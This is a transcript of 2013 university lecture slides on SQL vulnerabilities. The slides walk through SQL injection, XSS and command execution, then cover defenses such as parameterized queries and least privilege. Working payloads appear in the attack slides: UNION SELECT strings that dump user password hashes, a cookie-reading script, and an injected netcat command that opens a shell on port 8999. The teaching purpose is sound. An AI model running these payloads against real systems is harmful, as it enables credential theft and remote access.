Transcript SQL Vulnerabilities - University of Tulsa

Nick Tsamis
University of Tulsa
CS 7493
April 2013




What is SQL?
Why SQL Matters.
*yawn* What’s the big deal?
What could possibly go wrong?
 SQL Injection
 XSS
 Command Execution
 *pffft* So we shouldn’t use SQL?
 That’s some smart SQL!
Structured Query Language
 Language
 Specialized programming language
 Utilized in relational databases
Query
 Raw data is queried to obtain information
 “Our business is turning data into
information.” – Michael A. Peterson
 Structured
 Adheres to a strict, defined format
Query
Table
Column
• Top down flow only
Relational
Databases
vs Hierarchical Databases
• Data relations are stored
Popularity
 One of the first commercial languages for
relational models
 Today, exists as the de facto standard
 (ANSI and ISO)
 It’s EVERYWHERE
Versatility
 It’s flexible:
 T-SQL
 MySQL
 LINQ
Vulnerabilities
 SQL is powerful…if you grant it
 Manages data some of which is sensitive
 Provides a great entry point for access
 Recovering lost password:
*yawn*
 Security is not always implicit
 Raw SQL can be very vulnerable to simple injections
 if $EMAIL = “anything' OR 'x'='x”
SQL Injection
 Injecting unintended code into a query
 Returning user name from ID
 Source code
Injections.
 The attack
 We add a second condition that will always
examine true (1=1)
 Purpose is to dump all user information
 $id = ‘ or 1=1 #
 WHERE user_id = ‘ ’ or 1=1 # ’ ”;
SQL Injection
 Injecting unintended code into a query
 Returning sql information
 The attack(s)
 We add a union select to dump additional data
 $id = ‘ union SELECT 1, user() #
 Yields current sql user
 $id = ‘ and 1=1 union select database(),version() #
 Yields current sql version and database name
Injections.
SQL Injection
 Injecting unintended code into a query
 Case Study
 Returning the good stuff!!
 The attack(s)
 We add a union select to dump password data
 $id = ‘ union select user, password FROM users #
 Yields current user and associated password (hash)
Injections.
XSS (Cross Site Scripting)
 Execute unintended scripts inline
 Throw an alert
 Passed as a url argument
XSS.
 What if we put an inline script in that url?
 Alert box shown:
XSS (Cross Site Scripting)
 Well that wasn’t exactly l33t…
 Have a cookie
 <script>alert(document.cookie)</script>
 Alert box shown:
XSS.
 More serious implications:
 Run a custom script that can open a remote
connection (backdoor)
 Read and dump configuration data (SQL or OS)
Command Execution
 Use the secret entrance
 A site that allows for free IP Pinging
 Sample source:
Execution.
 Concatenating commands might work…
 192.168.200.128;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe
 Attempts to allow connections on port 8999 with netcat (nc)

 Upon execution, browser waits for
connection on port 8999
Better SQL
 Stored Procedures
 Preformat and secure a static query
 Grant access to a SP, not the tables it accesses
Typically increased performance
 Parameter check – data typing
 No network traffic – run inside the engine
*pffft*
 String Filtering/Escaping
 String escape characters
 ‘
 “
 \
 NUL
No, we should use better SQL.
Mo’ Better SQL
 Parameterized SQL
 Strongly typed data is bound on execution
 Parameters are populated and checked
 User input is not directly embedded
*pffft*
 Database Management
 Permission limitation
 Principle of Least Privilege
No, we should use better SQL.
 http://upload.wikimedia.org/wikipedia/commons/thumb
/e/eb/Hierarchical_Model.svg/320pxHierarchical_Model.svg.png
 http://www.ibm.com/developerworks/library/xmatters8/relat.gif
 http://upload.wikimedia.org/wikipedia/commons/a/aa/S
QL_ANATOMY_wiki.svg
 http://www.unixwiz.net/techtips/sql-injection.html
 http://wikipedia.org
 http://www.codinghorror.com/blog/2005/04/give-meparameterized-sql-or-give-me-death.html